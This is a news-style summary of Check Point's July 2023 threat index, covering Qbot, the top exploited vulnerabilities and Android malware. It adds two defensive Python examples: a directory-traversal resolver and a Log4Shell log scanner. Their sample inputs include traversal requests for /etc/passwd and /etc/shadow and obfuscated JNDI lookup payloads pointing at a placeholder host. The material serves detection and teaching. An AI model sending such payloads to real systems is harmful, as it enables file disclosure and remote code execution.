Check Point’s Threat Index Reveals Growing Impact of Qbot Malware

In its Global Threat Index for July 2023, Check Point Software Technologies, a cybersecurity solutions provider, highlights the impact of the Qbot malware on organizations in India during that month.
Qbot, also known as Qakbot, is a multipurpose malware that first emerged in 2008. It has resurfaced with an impact of 10.98 percent on Indian organizations, a measure of how widely it is being used in attacks.

Qbot is notorious for its capabilities, which include stealing user credentials, logging keystrokes, exfiltrating cookies from web browsers, monitoring banking activities, and deploying additional malicious software. Often propagated through spam emails, Qbot employs sophisticated anti-VM (virtual machine), anti-debugging, and anti-sandbox techniques to elude detection and analysis. Since its reemergence in 2022, it has gained notoriety as one of the most widespread Trojans.

The report also delves into the industries most affected by cyber threats in India during this period. The Utilities sector led the list of the most targeted industries, followed closely by Transportation, Software vendors, and Retail/Wholesale sectors. These findings underscore the pervasive nature of cyber threats across various sectors of the Indian economy.

Maya Horowitz, Vice President of Research at Check Point Software, stressed the challenges organizations face during this time of the year, characterized by altered staffing levels due to vacations. She recommended that businesses implement automated and consolidated security processes to effectively manage threats and risks, alongside user education to enhance overall cybersecurity practices.

Furthermore, Check Point’s research identified the most exploited vulnerabilities worldwide. “Web Servers Malicious URL Directory Traversal” ranked as the top exploited vulnerability, affecting 49 percent of organizations globally. This was followed by “Apache Log4j Remote Code Execution” impacting 45 percent of organizations and “HTTP Headers Remote Code Execution” with a global impact of 42 percent.

Regarding malware families, Qbot emerged as the most prevalent during this period, impacting 5 percent of organizations worldwide. Formbook followed closely with a global impact of 4 percent, while Remcos rounded out the top three with a global impact of 2 percent.

Qbot’s resurgence in the cyber threat landscape serves as a reminder of the evolving nature of malware and the importance of robust cybersecurity measures to safeguard sensitive data and critical systems.

In an interconnected world where cyber threats continue to grow in sophistication, organizations must remain vigilant and proactive in fortifying their digital defenses to counteract these malicious activities effectively.

Education and Research retained their unfortunate distinction as the most attacked industry globally, followed by Government and Military, and then Healthcare.

The report also describes the three vulnerabilities that cybercriminals exploited most heavily during the month.

Web Servers Malicious URL Directory Traversal is a vulnerability class stemming from input validation errors in web servers: a requested URL containing "../" sequences, often percent-encoded, is mapped onto the filesystem without being confined to the document root. Exploiting it lets an unauthenticated remote attacker read or disclose arbitrary files on the vulnerable server.
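As an added example (not from the report or from Check Point), the following Python places the input-validation error behind directory traversal next to a hardened resolver, and runs both over request paths constructed for the illustration. The document root, the request paths and the file names are assumptions for the example, not data from the report.

```python
"""Directory traversal: a vulnerable path resolver next to a hardened one.

Added example, not Check Point's code. WEB_ROOT and the request paths are
constructed for the illustration.
"""
import posixpath
from typing import Optional
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"  # assumed document root


def vulnerable_resolve(url_path: str) -> str:
    """Decode the URL once and map it straight onto the filesystem.

    Nothing confines the result to WEB_ROOT, so "../" components (plain or
    percent-encoded) walk up and out of the document root.
    """
    decoded = unquote(url_path).lstrip("/")
    return posixpath.normpath(posixpath.join(WEB_ROOT, decoded))


def safe_resolve(url_path: str) -> Optional[str]:
    """Return the filesystem path for url_path, or None if it must be refused.

    1. Decode until the string stops changing (catches %252e double encoding
       aimed at a second decoding layer downstream); refuse if it never settles.
    2. Refuse NUL bytes, which truncate paths in C-based servers.
    3. Treat backslashes as separators so "..\\" cannot slip past a "../" check.
    4. Canonicalise and require the result to stay inside WEB_ROOT.
    """
    decoded = url_path
    for _ in range(3):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    if unquote(decoded) != decoded:
        return None
    if "\x00" in decoded:
        return None
    decoded = decoded.replace("\\", "/").lstrip("/")
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, decoded))
    if candidate != WEB_ROOT and not candidate.startswith(WEB_ROOT + "/"):
        return None
    return candidate


# Constructed request paths, as they might appear in an access log.
SAMPLE_REQUESTS = [
    "/index.html",                                    # ordinary request
    "/images/../index.html",                          # ".." but stays inside the root
    "/../../../etc/passwd",                           # plain traversal
    "/%2e%2e/%2e%2e/%2e%2e/etc/passwd",               # percent-encoded dots
    "/%252e%252e/%252e%252e/%252e%252e/etc/passwd",   # double-encoded
    "/..\\..\\..\\windows\\win.ini",                  # backslash separators
    "/static/..%2f..%2f..%2fetc%2fshadow",            # encoded slashes
]


def classify(requests):
    """Map each request path to 'allowed' or 'blocked' under safe_resolve."""
    return {r: ("blocked" if safe_resolve(r) is None else "allowed") for r in requests}


if __name__ == "__main__":
    for path, verdict in classify(SAMPLE_REQUESTS).items():
        print(f"{verdict:8} {path!r:50} vulnerable -> {vulnerable_resolve(path)}")
```

The vulnerable resolver happily returns "/etc/passwd" for the plain and single-encoded payloads; the hardened one refuses anything whose canonical form leaves WEB_ROOT, while still allowing a ".." that stays inside the root. The same canonicalise-then-compare check is what a web application firewall signature for this vulnerability class is approximating.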

Apache Log4j Remote Code Execution (CVE-2021-44228) is a vulnerability in the Apache Log4j logging library. Successful exploitation lets a remote attacker execute arbitrary code on the affected system.
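As an added example (not Check Point's code), here is a small Python triage scanner for the CVE-2021-44228 lookup strings that show up in web server logs when this vulnerability is probed. It collapses the nested-lookup obfuscations attackers use to hide the word "jndi" before matching. The access-log lines are constructed for the example, and 203.0.113.0/24 is the documentation address range, not a real attacker host.

```python
"""Flag Log4Shell (CVE-2021-44228) lookup strings in web server logs.

Added example, not Check Point's code. The access-log lines are constructed;
203.0.113.0/24 is the documentation range, not a real attacker host.
"""
import re
from typing import List, Optional, Tuple

# Innermost ${...} lookup: no further "$", "{" or "}" inside.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# What we ultimately look for once the nesting has been collapsed.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.IGNORECASE)


def _simplify(inner: str) -> Optional[str]:
    """Resolve the lookup idioms attackers use to hide the word 'jndi'.

    ${lower:X} / ${upper:X}   -> x / X
    ${anything:-default}      -> default   (e.g. ${::-j}, ${env:NOPE:-n})
    Anything else, including a real jndi: lookup, is left in place.
    """
    if ":-" in inner:
        return inner.split(":-", 1)[1]
    key, sep, rest = inner.partition(":")
    if sep and key.lower() == "lower":
        return rest.lower()
    if sep and key.lower() == "upper":
        return rest.upper()
    return None


def normalize(text: str, max_rounds: int = 10) -> str:
    """Collapse nested lookups from the inside out until nothing more resolves."""
    for _ in range(max_rounds):
        changed = False

        def repl(m: "re.Match[str]") -> str:
            nonlocal changed
            out = _simplify(m.group(1))
            if out is None:
                return m.group(0)
            changed = True
            return out

        text = _INNERMOST.sub(repl, text)
        if not changed:
            break
    return text


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line number, JNDI scheme) for each line carrying a jndi: lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = _JNDI.search(normalize(line))
        if m:
            hits.append((n, m.group(1).lower()))
    return hits


# Constructed access-log lines: one clean, three hostile, one benign lookup.
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Jul/2023:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [20/Jul/2023:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [20/Jul/2023:10:01:09 +0000] "GET /?q=${${lower:j}ndi:${lower:r}mi://203.0.113.7/b} HTTP/1.1" 404 0 "-" "curl/7.88"',
    '10.0.0.9 - - [20/Jul/2023:10:01:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.7/c}"',
    '10.0.0.3 - - [20/Jul/2023:10:01:15 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 200 512 "-" "-"',
]

if __name__ == "__main__":
    for line_no, scheme in scan(SAMPLE_LOG):
        print(f"line {line_no}: jndi lookup via {scheme}")
```

A plain substring match for "jndi" catches only the first hostile line; the two obfuscated payloads only become visible after the inner lookups are resolved. The scanner models just the idioms used for hiding, not Log4j's full lookup behaviour (real environment values are unknown to it), so treat it as first-pass triage for deciding which hosts to examine, not as proof of compromise.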

HTTP Headers Remote Code Execution (CVE-2020-10826, CVE-2020-10827, CVE-2020-10828, CVE-2020-13756) covers flaws in which attacker-controlled HTTP headers are used to inject and execute arbitrary code on the victim machine.

The report also covers mobile malware, where Anubis tops the "Top Mobile Malwares" category. Anubis began as a banking Trojan targeting Android devices and has since grown into a versatile threat with Remote Access Trojan (RAT) capabilities, keylogging, audio recording and ransomware functionality. It has been found in numerous applications on the Google Play Store.

SpinOk, an Android software module, holds the second position. Operating as spyware, SpinOk collects information about files stored on the device and transfers it to the attackers. It was discovered in more than 100 Android apps with a combined download count exceeding 421 million as of May 2023.

AhMyth, a Remote Access Trojan (RAT) first identified in 2017, rounds out the top three. Distributed via Android apps available on various platforms, AhMyth can harvest sensitive data, log keystrokes, capture screenshots, send SMS messages and activate the camera.

The report’s findings underscore the persistent need for industries, organizations, and individuals to remain vigilant against evolving cyber threats. Implementing robust security measures and staying informed about the latest vulnerabilities and malware trends is crucial in safeguarding sensitive data and digital assets.
